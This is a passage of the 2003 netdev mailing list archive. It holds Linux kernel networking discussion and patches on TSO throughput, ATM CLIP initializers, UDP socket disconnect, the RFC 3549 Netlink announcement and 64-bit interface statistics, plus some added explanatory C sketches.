-- Dave Hansen haveblue@us.ibm.com From haveblue@us.ibm.com Wed Jul 2 21:59:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 21:59:13 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h634x82x017763 for ; Wed, 2 Jul 2003 21:59:09 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h634x2Ys225030; Thu, 3 Jul 2003 00:59:02 -0400 Received: from nighthawk.sr71.net (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h634wxqO257098; Thu, 3 Jul 2003 00:59:00 -0400 Subject: RE: impressive throughput on 2.5.73 From: Dave Hansen To: Scott Feldman Cc: netdev@oss.sgi.com, Nivedita Singhvi In-Reply-To: References: Content-Type: text/plain Organization: Message-Id: <1057208329.2957.96.camel@nighthawk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.4 Date: 02 Jul 2003 21:58:49 -0700 Content-Transfer-Encoding: 7bit X-archive-position: 3738 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev On Wed, 2003-07-02 at 21:41, Feldman, Scott wrote: > > server, using apache. I'm impressed that it can fill just > > about the entire gigabit pipe, while using less than 1 of the > > server's CPUs. > > 1 PIII CPU per 1GbE interface is a good rule of thumb. A 10GbE > interface would consume your 8-way, right? Sounds right :) > How many TSO per/second are you doing? 
> > # watch "ethtool -S ethX | grep tx_tcp_seg" ethtool 1.6 fixed my -S problem ~3500, apparently tx_tcp_seg_good: 401212 tx_tcp_seg_failed: 0 -- Dave Hansen haveblue@us.ibm.com From zwane@arm.linux.org.uk Wed Jul 2 22:51:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 22:51:46 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h635pZ2x019268 for ; Wed, 2 Jul 2003 22:51:37 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.203.207.204]) by hemi.commfireservices.com (Postfix) with ESMTP id 68AADBC51; Thu, 3 Jul 2003 01:41:20 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h635eLvo007264; Thu, 3 Jul 2003 01:40:21 -0400 Date: Thu, 3 Jul 2003 01:40:21 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: "Feldman, Scott" Cc: Dave Hansen , netdev@oss.sgi.com, Nivedita Singhvi Subject: RE: impressive throughput on 2.5.73 In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3740 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev On Wed, 2 Jul 2003, Feldman, Scott wrote: > Interrupt mitigation must be on if you're only getting 9K intr/sec. If > you where getting one interrupt per packet, you'd see an order of > magnitude higher intr/sec rate. What about the e1000 hw interrupt mitigation, isn't the interrupt throttle on by default? 
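For reference, the "order of magnitude" remark quoted above can be checked with a little arithmetic. The sketch below is only an illustration: it assumes full-size 1500-byte frames (the usual Ethernet MTU, headers ignored) and takes the 110 MB/second and ~9k interrupts/sec figures from earlier in the thread. The function names are made up for this example.

```c
/* Frames per second needed to carry a given byte rate, assuming every
 * frame carries bytes_per_frame bytes (assumption: 1500, no header
 * overhead accounted for). */
double frames_per_sec(double bytes_per_sec, double bytes_per_frame)
{
    return bytes_per_sec / bytes_per_frame;
}

/* Average number of frames handled per interrupt. */
double frames_per_intr(double frames_sec, double intr_sec)
{
    return frames_sec / intr_sec;
}
```

Under those assumptions, frames_per_sec(110e6, 1500.0) is roughly 73,000, and dividing that by 9000 interrupts/sec gives about 8 frames per interrupt, which fits the suggestion that some form of mitigation is already active.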
Zwane -- function.linuxpower.ca From yoshfuji@linux-ipv6.org Thu Jul 3 02:38:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 02:38:51 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h639ch2x024187 for ; Thu, 3 Jul 2003 02:38:44 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h639cpBo009420; Thu, 3 Jul 2003 18:38:52 +0900 Date: Thu, 03 Jul 2003 18:38:50 +0900 (JST) Message-Id: <20030703.183850.78164037.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au, chas@cmf.nrl.navy.mil CC: netdev@oss.sgi.com, linux-atm-general@lists.sourceforge.net, yoshfuji@linux-ipv6.org Subject: [PATCH] ATM: CLIP: C99 initializers From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3743 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. This converts clip_tbl to C99 initializers. (It also fixes the wrong values for proxy_qlen and locktime.) Thanks. 
Index: linux-2.5/net/atm/clip.c =================================================================== RCS file: /home/cvs/linux-2.5/net/atm/clip.c,v retrieving revision 1.17 diff -u -r1.17 clip.c --- linux-2.5/net/atm/clip.c 23 Jun 2003 22:08:56 -0000 1.17 +++ linux-2.5/net/atm/clip.c 3 Jul 2003 08:17:44 -0000 @@ -327,40 +327,34 @@ return hash_val; } - static struct neigh_table clip_tbl = { - NULL, /* next */ - AF_INET, /* family */ - sizeof(struct neighbour)+sizeof(struct atmarp_entry), /* entry_size */ - 4, /* key_len */ - clip_hash, - clip_constructor, /* constructor */ - NULL, /* pconstructor */ - NULL, /* pdestructor */ - NULL, /* proxy_redo */ - "clip_arp_cache", - { /* neigh_parms */ - NULL, /* next */ - NULL, /* neigh_setup */ - &clip_tbl, /* tbl */ - 0, /* entries */ - NULL, /* priv */ - NULL, /* sysctl_table */ - 30*HZ, /* base_reachable_time */ - 1*HZ, /* retrans_time */ - 60*HZ, /* gc_staletime */ - 30*HZ, /* reachable_time */ - 5*HZ, /* delay_probe_time */ - 3, /* queue_len */ - 3, /* ucast_probes */ - 0, /* app_probes */ - 3, /* mcast_probes */ - 1*HZ, /* anycast_delay */ - (8*HZ)/10, /* proxy_delay */ - 1*HZ, /* proxy_qlen */ - 64 /* locktime */ + .family = AF_INET, + .entry_size = sizeof(struct neighbour)+sizeof(struct atmarp_entry), + .key_len = 4, + .hash = clip_hash, + .constructor = clip_constructor, + .id = "clip_arp_cache", + + /* parameters are copied from ARP ... */ + .parms = { + .tbl = &clip_tbl, + .base_reachable_time = 30 * HZ, + .retrans_time = 1 * HZ, + .gc_staletime = 60 * HZ, + .reachable_time = 30 * HZ, + .delay_probe_time = 5 * HZ, + .queue_len = 3, + .ucast_probes = 3, + .mcast_probes = 3, + .anycast_delay = 1 * HZ, + .proxy_delay = (8 * HZ) / 10, + .proxy_qlen = 64, + .locktime = 1 * HZ, }, - 30*HZ,128,512,1024 /* copied from ARP ... 
*/ + .gc_interval = 30 * HZ, + .gc_thresh1 = 128, + .gc_thresh2 = 512, + .gc_thresh3 = 1024, }; -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From jmorris@intercode.com.au Thu Jul 3 04:14:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 04:14:17 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:Zdb8oZtOJR7QKm2UDpQnqzfsE8lpvVJb@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63BDs2x026968 for ; Thu, 3 Jul 2003 04:13:56 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h63ADpr18579; Thu, 3 Jul 2003 20:13:51 +1000 Date: Thu, 3 Jul 2003 20:13:51 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , , Subject: Re: [PATCH] NET: fix SEGV/OOPS with /proc/net/{raw,igmp,...} (is Re: [Bug 863] New: cat /proc/buddyinfo + netstat -a kills machine) In-Reply-To: <20030703.154429.06241047.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3744 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 3 Jul 2003, YOSHIFUJI Hideaki / 吉藤英明 wrote: > I'm not so sure if this is related to BUG#863, but anyway; > > Following patch fixes segv/oops with /proc/net/{raw,igmp,mfilter, > raw6,igmp6,mfilter6,anycast,ip6_flowlabel}. 
Applied to bk://kernel.bkbits.net/jmorris/net-2.5 - James -- James Morris From mcr@sandelman.ottawa.on.ca Thu Jul 3 09:35:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 09:35:15 -0700 (PDT) Received: from noxmail.sandelman.ottawa.on.ca (cyphermail.sandelman.ottawa.on.ca [192.139.46.78]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63GYs2x006599 for ; Thu, 3 Jul 2003 09:35:04 -0700 Received: from lox.sandelman.ottawa.on.ca (IDENT:root@lox.sandelman.ottawa.on.ca [192.139.46.2]) by noxmail.sandelman.ottawa.on.ca (8.11.6p2/8.11.6) with ESMTP id h63GYcw18729 (using TLSv1/SSLv3 with cipher EDH-RSA-DES-CBC3-SHA (168 bits) verified NO) for ; Thu, 3 Jul 2003 12:34:40 -0400 (EDT) Received: from sandelman.ottawa.on.ca (marajade.sandelman.ottawa.on.ca [192.139.46.20]) by lox.sandelman.ottawa.on.ca (8.11.6/8.11.6) with ESMTP id h63Ga5Y03011 for ; Thu, 3 Jul 2003 12:36:05 -0400 (EDT) Received: from marajade.sandelman.ottawa.on.ca (mcr@localhost) by sandelman.ottawa.on.ca (8.12.3/8.12.3/Debian -4) with ESMTP id h63GYIHc012786 for ; Thu, 3 Jul 2003 12:34:21 -0400 To: netdev Subject: rfc-editor@rfc-editor.org: RFC 3549 on Linux Netlink as an IP Services Protocol Mime-Version: 1.0 (generated by tm-edit 1.8) Content-Type: text/plain; charset=US-ASCII Date: Thu, 03 Jul 2003 12:34:18 -0400 Message-ID: <12785.1057250058@marajade.sandelman.ottawa.on.ca> From: Michael Richardson X-archive-position: 3745 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mcr@sandelman.ottawa.on.ca Precedence: bulk X-list: netdev From owner-ietf-announce@ietf.org Wed Jul 2 21:00:43 2003 Return-Path: Message-Id: <200307022318.h62NI9L04528@gamma.isi.edu> To: IETF-Announce: ; Subject: RFC 3549 on Linux Netlink as an IP Services Protocol Cc: rfc-editor@rfc-editor.org, forces@peach.ease.lsoft.com From: rfc-editor@rfc-editor.org Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary=NextPart Date: Wed, 02 Jul 2003 
16:18:09 -0700 Sender: owner-ietf-announce@ietf.org Precedence: bulk --NextPart A new Request for Comments is now available in online RFC libraries. RFC 3549 Title: Linux Netlink as an IP Services Protocol Author(s): J. Salim, H. Khosravi, A. Kleen, A. Kuznetsov Status: Informational Date: July 2003 Mailbox: hadi@znyx.com, hormuzd.m.khosravi@intel.com, ak@suse.de, kuznet@ms2.inr.ac.ru Pages: 33 Characters: 72161 Updates/Obsoletes/SeeAlso: None I-D Tag: draft-ietf-forces-netlink-04.txt URL: ftp://ftp.rfc-editor.org/in-notes/rfc3549.txt This document describes Linux Netlink, which is used in Linux both as an intra-kernel messaging system as well as between kernel and user space. The focus of this document is to describe Netlink's functionality as a protocol between a Forwarding Engine Component (FEC) and a Control Plane Component (CPC), the two components that define an IP service. As a result of this focus, this document ignores other uses of Netlink, including its use as a intra-kernel messaging system, as an inter-process communication scheme (IPC), or as a configuration tool for other non-networking or non-IP network services (such as decnet, etc.). This document is intended as informational in the context of prior art for the ForCES IETF working group. This document is a product of the Forwarding and Control Element Separation Working Group of the IETF. This memo provides information for the Internet community. It does not specify an Internet standard of any kind. Distribution of this memo is unlimited. This announcement is sent to the IETF list and the RFC-DIST list. Requests to be added to or deleted from the IETF distribution list should be sent to IETF-REQUEST@IETF.ORG. Requests to be added to or deleted from the RFC-DIST distribution list should be sent to RFC-DIST-REQUEST@RFC-EDITOR.ORG. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to rfc-info@RFC-EDITOR.ORG with the message body help: ways_to_get_rfcs. 
For example: To: rfc-info@RFC-EDITOR.ORG Subject: getting rfcs help: ways_to_get_rfcs Requests for special distribution should be addressed to either the author of the RFC in question, or to RFC-Manager@RFC-EDITOR.ORG. Unless specifically noted otherwise on the RFC itself, all RFCs are for unlimited distribution. Submissions for Requests for Comments should be sent to RFC-EDITOR@RFC-EDITOR.ORG. Please consult RFC 2223, Instructions to RFC Authors, for further information. Joyce K. Reynolds and Sandy Ginoza USC/Information Sciences Institute ... Below is the data which will enable a MIME compliant Mail Reader implementation to automatically retrieve the ASCII version of the RFCs. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="RFC-INFO@RFC-EDITOR.ORG" Content-Type: text/plain Content-ID: <030702161638.RFC@RFC-EDITOR.ORG> RETRIEVE: rfc DOC-ID: rfc3549 --OtherAccess Content-Type: Message/External-body; name="rfc3549.txt"; site="ftp.isi.edu"; access-type="anon-ftp"; directory="in-notes" Content-Type: text/plain Content-ID: <030702161638.RFC@RFC-EDITOR.ORG> --OtherAccess-- --NextPart-- From yoshfuji@linux-ipv6.org Thu Jul 3 10:27:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 10:27:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63HRh2x007697 for ; Thu, 3 Jul 2003 10:27:45 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h63HSxBo012759; Fri, 4 Jul 2003 02:28:59 +0900 Date: Fri, 04 Jul 2003 02:28:57 +0900 (JST) Message-Id: <20030704.022857.07343571.yoshfuji@linux-ipv6.org> To: shibu_lkml@yahoo.com, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: [PATCH] NET: disconnect support by null address (is Re: Disconnecting a 
connected UDP socket) From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030703031610.79050.qmail@web20704.mail.yahoo.com> References: <20030703031610.79050.qmail@web20704.mail.yahoo.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3746 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. In article <20030703031610.79050.qmail@web20704.mail.yahoo.com> (at Wed, 2 Jul 2003 20:16:10 -0700 (PDT)), Shibu LKML says: > I am wondering if Linux supports disconnecting a connected UDP socket. The manpage for connect lists it in the BUGS section. It says disconnect is still not supported. I was wondering if it involves more than adding the following lines to udp_connect in udp.c > > if (usin->sin_family == AF_UNSPEC) > return udp_disconnect(sk, 0); > > (just above sk_dst_reset(sk)) > > Will this fix the problem for IPV4 stuff? It seems. Please apply this. 
Index: linux-2.5/net/ipv4/udp.c
===================================================================
RCS file: /home/cvs/linux-2.5/net/ipv4/udp.c,v
retrieving revision 1.36
diff -u -r1.36 udp.c
--- linux-2.5/net/ipv4/udp.c	21 Jun 2003 16:20:28 -0000	1.36
+++ linux-2.5/net/ipv4/udp.c	3 Jul 2003 16:01:29 -0000
@@ -868,6 +868,9 @@
 	if (addr_len < sizeof(*usin))
 		return -EINVAL;
 
+	if (usin->sin_family == AF_UNSPEC)
+		return udp_disconnect(sk, 0);
+
 	if (usin->sin_family != AF_INET)
 		return -EAFNOSUPPORT;
 
Index: linux-2.5/net/ipv6/udp.c
===================================================================
RCS file: /home/cvs/linux-2.5/net/ipv6/udp.c,v
retrieving revision 1.39
diff -u -r1.39 udp.c
--- linux-2.5/net/ipv6/udp.c	1 Jul 2003 16:42:06 -0000	1.39
+++ linux-2.5/net/ipv6/udp.c	3 Jul 2003 16:01:29 -0000
@@ -213,6 +213,9 @@
 	int addr_type;
 	int err;
 
+	if (usin->sin6_family == AF_UNSPEC)
+		return udp_disconnect(sk, 0);
+
 	if (usin->sin6_family == AF_INET) {
 		if (__ipv6_only_sock(sk))
 			return -EAFNOSUPPORT;

-- 
Hideaki YOSHIFUJI @ USAGI Project
GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA
From yoshfuji@linux-ipv6.org Thu Jul 3 10:47:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 10:47:38 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63HlV2x009392 for ; Thu, 3 Jul 2003 10:47:32 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h63HmoBo012935; Fri, 4 Jul 2003 02:48:50 +0900 Date: Fri, 04 Jul 2003 02:48:50 +0900 (JST) Message-Id: <20030704.024850.88858438.yoshfuji@linux-ipv6.org> To: shibu_lkml@yahoo.com, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: [PATCH] NET: disconnect support by null address (is Re: Disconnecting a connected UDP socket) From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: 
<20030704.022857.07343571.yoshfuji@linux-ipv6.org> References: <20030703031610.79050.qmail@web20704.mail.yahoo.com> <20030704.022857.07343571.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3747 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030704.022857.07343571.yoshfuji@linux-ipv6.org> (at Fri, 04 Jul 2003 02:28:57 +0900 (JST)), YOSHIFUJI Hideaki / 吉藤英明 says: > It seems. Please apply this. Sorry, I was too hasty. net/ipv4/af_inet.c:inet_dgram_connect() already handles this case. Please forget the patch... 
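Since the disconnect is handled at the inet_dgram_connect() level, the behaviour can be checked from user space. The following is a minimal sketch, assuming a Linux kernel that dissolves the association when connect() is called with sa_family set to AF_UNSPEC. The helper name udp_connect_then_disconnect() and the choice of port 9 on loopback are assumptions for this example only; no packet is actually sent.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/*
 * Connect a UDP socket, then dissolve the association by calling
 * connect() again with sa_family set to AF_UNSPEC.
 * Returns 0 if the socket has a peer after the first connect() and
 * reports ENOTCONN after the second; returns -1 otherwise.
 */
int udp_connect_then_disconnect(void)
{
    struct sockaddr_in peer;
    struct sockaddr unspec;
    struct sockaddr_storage name;
    socklen_t len;
    int ok = -1;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);

    if (fd < 0)
        return -1;

    memset(&peer, 0, sizeof(peer));
    peer.sin_family = AF_INET;
    peer.sin_port = htons(9);                       /* arbitrary port */
    peer.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (connect(fd, (struct sockaddr *)&peer, sizeof(peer)) < 0)
        goto out;

    /* The socket should now have a peer address. */
    len = sizeof(name);
    if (getpeername(fd, (struct sockaddr *)&name, &len) < 0)
        goto out;

    /* Ask the kernel to drop the association. */
    memset(&unspec, 0, sizeof(unspec));
    unspec.sa_family = AF_UNSPEC;
    if (connect(fd, &unspec, sizeof(unspec)) < 0)
        goto out;

    /* With no peer left, getpeername() is expected to fail. */
    len = sizeof(name);
    if (getpeername(fd, (struct sockaddr *)&name, &len) < 0 &&
        errno == ENOTCONN)
        ok = 0;
out:
    close(fd);
    return ok;
}
```

A return value of 0 from this helper would suggest that the running kernel already supports the disconnect, without any change to udp_connect().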
-- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From greearb@candelatech.com Thu Jul 3 11:01:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 11:01:21 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63I1B2x009802 for ; Thu, 3 Jul 2003 11:01:12 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h63I0sKk024810; Thu, 3 Jul 2003 11:00:55 -0700 Message-ID: <3F046F56.1080808@candelatech.com> Date: Thu, 03 Jul 2003 11:00:54 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Michael Richardson , hadi@znyx.com, hormuzd.m.khosravi@intel.com, ak@suse.de, kuznet@ms2.inr.ac.ru, "'netdev@oss.sgi.com'" Subject: Re: rfc-editor@rfc-editor.org: RFC 3549 on Linux Netlink as an IP Services Protocol References: <12785.1057250058@marajade.sandelman.ottawa.on.ca> In-Reply-To: <12785.1057250058@marajade.sandelman.ottawa.on.ca> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3748 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Please make the 'table-id' field to be at least 16 bits. Now that we have VLANs and other types of virtual interfaces, it would be nice to be able to have a routing table for each interface, for example. 640k was not enough for everyone, and ~250 routing tables isn't either :) From section 3.1.1: Table ID: 8 bits Table identifier. Up to 255 route tables are supported. RT_TABLE_UNSPEC An unspecified routing table. RT_TABLE_DEFAULT The default table. RT_TABLE_MAIN The main table. RT_TABLE_LOCAL The local table. 
   The user may assign arbitrary values between RT_TABLE_UNSPEC(0) and RT_TABLE_DEFAULT(253).

Thanks,
Ben

--
Ben Greear
President of Candela Technologies Inc http://www.candelatech.com
ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear

From jgarzik@pobox.com Thu Jul 3 19:47:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 19:47:17 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h642lA2x018741 for ; Thu, 3 Jul 2003 19:47:11 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19YGbL-0006Gs-Lu; Fri, 04 Jul 2003 03:47:07 +0100 Message-ID: <3F04EAA0.2050102@pobox.com> Date: Thu, 03 Jul 2003 22:46:56 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Jeff Sipek CC: Kernel Mailing List , Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307032231.39842.jeffpc@optonline.net> In-Reply-To: <200307032231.39842.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3749 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev

Jeff Sipek wrote:
> + spinlock_t rx_packets;
> + spinlock_t tx_packets;
> + spinlock_t rx_bytes;
> + spinlock_t tx_bytes;
> + spinlock_t rx_errors;
> + spinlock_t tx_errors;
> + spinlock_t rx_dropped;
> + spinlock_t tx_dropped;
> + spinlock_t multicast;
> + spinlock_t collisions;
> + spinlock_t rx_length_errors;
> + spinlock_t rx_over_errors;
> + spinlock_t rx_crc_errors;
> + spinlock_t rx_frame_errors;
> + spinlock_t rx_fifo_errors;
> + spinlock_t rx_missed_errors;
> + spinlock_t tx_aborted_errors;
> + spinlock_t tx_carrier_errors;
> + spinlock_t tx_fifo_errors;
> + spinlock_t tx_heartbeat_errors;
> + spinlock_t tx_window_errors;
> + spinlock_t rx_compressed;
> + spinlock_t tx_compressed;

That's a fat daddy list of locks you got there.

> + NETSTAT_TYPE _rx_packets; /* total packets received */
> + NETSTAT_TYPE _tx_packets; /* total packets transmitted */
> + NETSTAT_TYPE _rx_bytes; /* total bytes received */
> + NETSTAT_TYPE _tx_bytes; /* total bytes transmitted */
> + NETSTAT_TYPE _rx_errors; /* bad packets received */
> + NETSTAT_TYPE _tx_errors; /* packet transmit problems */
> + NETSTAT_TYPE _rx_dropped; /* no space in linux buffers */
> + NETSTAT_TYPE _tx_dropped; /* no space available in linux */
> + NETSTAT_TYPE _multicast; /* multicast packets received */
> + NETSTAT_TYPE _collisions;

Increasing user-visible sizes arbitrarily breaks stuff. Having config-dependent types like this increases complexity.

Short term, just sample the stats more rapidly.

Long term, I suppose with 10GbE we should start thinking about this. Personally, I would prefer to make the standard net device stats available in the format already exported by ETHTOOL_GSTATS -- which I note uses u64's for its counters, and it's easily extensible. I received a request for this just today, even.

Jeff

P.S. Please cc netdev@oss.sgi.com for networking discussions.

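[Archive note] A minimal sketch of the short-term suggestion above, i.e. sampling the existing 32-bit counters often enough from userspace and accumulating the differences into a 64-bit total. It is not taken from either poster's code; the struct and function names (counter64, counter64_init, counter64_update) are hypothetical, and the sketch assumes the counter wraps at most once between two samples. As a rough guide, a 32-bit byte counter on a saturated 10 Gbit/s link wraps in about 3.4 seconds.

```c
#include <stdint.h>

/* Hypothetical userspace helper: widens a wrapping 32-bit counter
 * into a 64-bit running total. Not part of the posted patch. */
struct counter64 {
	uint32_t last;   /* most recent raw 32-bit sample */
	uint64_t total;  /* accumulated 64-bit value */
};

/* Seed the accumulator with the first raw reading. */
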